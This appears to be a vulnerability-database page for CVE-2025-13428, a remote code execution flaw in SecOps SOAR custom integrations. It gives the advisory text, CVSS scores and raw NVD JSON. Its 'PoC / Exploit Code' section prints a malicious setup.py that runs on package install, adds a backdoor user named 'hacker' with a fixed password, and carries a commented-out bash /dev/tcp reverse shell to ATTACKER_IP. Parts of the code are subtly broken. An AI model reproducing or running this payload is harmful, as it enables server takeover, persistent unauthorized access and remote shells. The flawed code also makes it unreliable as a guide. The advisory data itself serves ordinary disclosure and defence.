Security Vulnerability Report
中文
CVE-2025-13428 CVSS 7.2 HIGH

CVE-2025-13428

Published: 2025-12-09 16:17:35
Last Modified: 2026-02-03 19:24:32
Source: f45cbf4e-4146-4068-b7e1-655ffc2c548c

Description

A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an "IDE role" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise. No customer action is required. All customers have been automatically upgraded to the fixed version: 6.3.64 or higher.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:security_operations_soar:*:*:*:*:*:*:*:* - VULNERABLE
SecOps SOAR Server < 6.3.64

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious setup.py for CVE-2025-13428 PoC # This demonstrates the RCE vulnerability in SecOps SOAR custom integrations from setuptools import setup import subprocess import os # Attacker's payload - reverse shell or arbitrary command execution def exploit(): # Example: Create a backdoor user try: # Execute system command during package installation subprocess.Popen(['useradd', '-p', '$(openssl passwd -1 evil123)', 'hacker'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Or execute reverse shell # subprocess.Popen(['bash', '-i', '&>/dev/tcp/ATTACKER_IP/PORT', '0>&1']) # Write proof of compromise with open('/tmp/pwned_cve_2025_13428.txt', 'w') as f: f.write('System compromised via CVE-2025-13428\n') f.write(f'Attacker: {os.environ.get("USER", "unknown")}\n') except Exception as e: pass setup( name='malicious-integration', version='1.0.0', author='Attacker', description='Malicious SecOps SOAR integration package', py_modules=[], # Execute payload during installation cmdclass={ 'install': type('EvilInstall', (), { 'run': lambda self: exploit() }) } )

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13428", "sourceIdentifier": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "published": "2025-12-09T16:17:35.307", "lastModified": "2026-02-03T19:24:32.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an \"IDE role\" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise.\n\nNo customer action is required. \n\n\nAll customers have been automatically upgraded to the fixed version: 6.3.64 or higher."}], "metrics": {"cvssMetricV40": [{"source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "CLEAR"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:security_operations_soar:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.3.64", "matchCriteriaId": "7B3CA808-0AE5-45E0-9F1D-BC19E8DD7A89"}]}]}], "references": [{"url": "https://cloud.google.com/support/bulletins#gcp-2025-075", "source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.